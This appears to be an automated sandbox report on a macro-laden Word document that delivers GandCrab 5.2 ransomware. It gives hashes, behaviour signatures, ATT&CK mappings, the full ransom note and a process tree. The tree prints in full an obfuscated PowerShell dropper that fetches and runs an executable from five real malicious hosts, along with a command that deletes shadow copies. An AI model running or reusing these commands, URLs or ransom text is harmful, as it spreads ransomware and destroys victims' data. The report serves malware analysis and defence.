Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    21-05-2022 00:29

General

  • Target

    dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm

  • Size

    78KB

  • MD5

    fe2d1caa2d52000efcd19ea1ea31d254

  • SHA1

    6496aa6a299bc606ee9d058bdf4f0d826a2e4541

  • SHA256

    dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb

  • SHA512

    592a3447aa75b48b578b9f6b08524482b16c701f152b2fc2c074e63a9be84f250b380913b172e44af1dffbb0e223b6f17b959ac342b417fcbccadb3272b51f2d

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    exe.dropper: https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe
    exe.dropper: http://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe
    exe.dropper: https://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe
    exe.dropper: http://sndtgo.ru/word.exe
    exe.dropper: http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe

Extracted

  • Path

    C:\KXCSWK-MANUAL.txt

  • Family

    gandcrab

  • Ransom Note

    ---= GANDCRAB V5.2 =---
    ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED***********************
    *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS*****
    Attention!
    All your files, documents, photos, databases and other important files are encrypted and have the extension: .KXCSWK
    The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.
    The server with your key is in a closed network TOR. You can get there by the following ways:
    ----------------------------------------------------------------------------------------
    | 0. Download Tor browser - https://www.torproject.org/
    | 1. Install Tor browser
    | 2. Open Tor Browser
    | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/93c436487f0515a
    | 4. Follow the instructions on this page
    ----------------------------------------------------------------------------------------
    On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free.
    ATTENTION!
    IN ORDER TO PREVENT DATA DAMAGE:
    * DO NOT MODIFY ENCRYPTED FILES
    * DO NOT CHANGE DATA BELOW
    ---BEGIN GANDCRAB KEY---
    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
    ---END GANDCRAB KEY---
    ---BEGIN PC DATA---
    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
    ---END PC DATA---

  • URLs

    http://gandcrabmfe6mnef.onion/93c436487f0515a

Signatures

  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2456
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:448
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3424
        • C:\windows\temp\229.exe
          "C:\windows\temp\229.exe"
          4⤵
          • Executes dropped EXE
          • Modifies extensions of user files
          • Checks computer location settings
          • Drops startup file
          • Enumerates connected drives
          • Sets desktop wallpaper using registry
          • Drops file in Program Files directory
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:1076
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
            5⤵
              PID:3100
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x4f4 0x4f8
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3876

Network

MITRE ATT&CK Matrix ATT&CK v6

Tactic, then technique (ATT&CK ID) and count:

  • Defense Evasion
    Modify Registry (T1112): 1
  • Credential Access
    Credentials in Files (T1081): 1
  • Discovery
    Query Registry (T1012): 4
    System Information Discovery (T1082): 5
    Peripheral Device Discovery (T1120): 1
  • Collection
    Data from Local System (T1005): 1
  • Impact
    Defacement (T1491): 1


Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
      Filesize

      162B

      MD5

      6b79b8a6efa3f47dbcadc9fdc69dc52d

      SHA1

      afe2b3e9ae5e84e7695f9b325d59f6a66c769576

      SHA256

      f6f3bc588a680613e90199955aead16cf4bd450cdba1c1cc7ab1d8de8d90210a

      SHA512

      184484a1fd9ddd1d704010c2fb897b2176d9371650e4eb2af432f58902007f9bea0f7eee9a8563c707bfee5200aaabd5538a44b7141d4e096a20ddf34c0a2d57

    • C:\Windows\Temp\229.exe
      Filesize

      535KB

      MD5

      a76b7140cf6d5c4dc5e0ecff23fc2ce0

      SHA1

      b312fef877f8eae6ca473a969f30bc85d907f7e3

      SHA256

      3a23fe7b3f8fa4d22a18aafc9c3c52746a7142cd33f8ddaaa264cf475939b972

      SHA512

      6a74b01537acf60408072d60f6a7b87c3f0d04a96301a3c1a051552f2248377c457a2a83505a6761017a2680ffce0c33cd8b4fa99e75212e13cdebd0a2f322e1

    • C:\windows\temp\229.exe
      Filesize

      535KB

      MD5

      a76b7140cf6d5c4dc5e0ecff23fc2ce0

      SHA1

      b312fef877f8eae6ca473a969f30bc85d907f7e3

      SHA256

      3a23fe7b3f8fa4d22a18aafc9c3c52746a7142cd33f8ddaaa264cf475939b972

      SHA512

      6a74b01537acf60408072d60f6a7b87c3f0d04a96301a3c1a051552f2248377c457a2a83505a6761017a2680ffce0c33cd8b4fa99e75212e13cdebd0a2f322e1

    • memory/448-137-0x0000000000000000-mapping.dmp
    • memory/1076-146-0x0000000000400000-0x000000000048D000-memory.dmp
      Filesize

      564KB

    • memory/1076-145-0x00000000021F0000-0x0000000002210000-memory.dmp
      Filesize

      128KB

    • memory/1076-142-0x0000000000000000-mapping.dmp
    • memory/2456-134-0x00007FFD89370000-0x00007FFD89380000-memory.dmp
      Filesize

      64KB

    • memory/2456-139-0x0000017971280000-0x0000017971284000-memory.dmp
      Filesize

      16KB

    • memory/2456-136-0x00007FFD86CE0000-0x00007FFD86CF0000-memory.dmp
      Filesize

      64KB

    • memory/2456-135-0x00007FFD86CE0000-0x00007FFD86CF0000-memory.dmp
      Filesize

      64KB

    • memory/2456-130-0x00007FFD89370000-0x00007FFD89380000-memory.dmp
      Filesize

      64KB

    • memory/2456-133-0x00007FFD89370000-0x00007FFD89380000-memory.dmp
      Filesize

      64KB

    • memory/2456-132-0x00007FFD89370000-0x00007FFD89380000-memory.dmp
      Filesize

      64KB

    • memory/2456-131-0x00007FFD89370000-0x00007FFD89380000-memory.dmp
      Filesize

      64KB

    • memory/3100-148-0x0000000000000000-mapping.dmp
    • memory/3424-138-0x0000000000000000-mapping.dmp
    • memory/3424-140-0x000001D426190000-0x000001D4261B2000-memory.dmp
      Filesize

      136KB

    • memory/3424-141-0x00007FFD9EA60000-0x00007FFD9F521000-memory.dmp
      Filesize

      10.8MB